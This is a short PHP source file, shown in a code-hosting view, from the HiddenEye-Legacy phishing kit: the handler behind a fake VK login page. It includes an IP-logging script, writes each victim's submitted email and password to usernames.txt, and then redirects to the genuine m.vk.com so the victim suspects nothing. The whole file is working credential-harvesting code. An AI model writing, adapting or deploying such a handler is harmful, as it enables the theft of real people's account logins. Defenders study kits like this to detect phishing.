HiddenEye-Legacy/WebPages/VK/post.php

7 lines
189 B
PHP
Raw Normal View History

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://m.vk.com');
exit();